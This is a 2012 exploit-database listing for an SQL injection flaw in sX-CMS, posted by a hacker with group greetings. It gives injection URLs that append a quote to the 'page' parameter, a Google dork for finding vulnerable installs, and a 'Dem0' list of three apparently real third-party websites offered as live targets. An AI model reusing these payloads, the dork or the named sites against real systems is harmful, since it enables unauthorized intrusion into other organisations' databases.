sX-CMS SQL injection Vulnerability

2012-04-05T00:00:00
ID 1337DAY-ID-17981
Type zdt
Reporter Ryuzaki Lawlet
Modified 2012-04-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: sX-CMS <= SQL injection Vulnerability
# Date: 06/04/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# Category: webapps
# version: -
# Vendor or Software Link: http://www.source-worx.de/
# Google dork: powered by sX-CMS
# Tested on: Linux
##################################################
[~]Exploit/p0c :

http://localhost:80/cms/index/page/_9'
http://localhost:80/cms/index.php?page='9

[~]Dem0 :

http://www.general-aero.com/cms/cms/index/page/_9'
http://www.naturel-europe.de/cms/index/page/_9'
http://www.cycletec.de/cms/index.php?page=-9'


FB : www.fb.me/justryuz
+---------------------------------------------------+
  Greetz to :
[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]
[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC ]
[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]
-----------------------------------------------------+



#  0day.today [2017-12-31]  #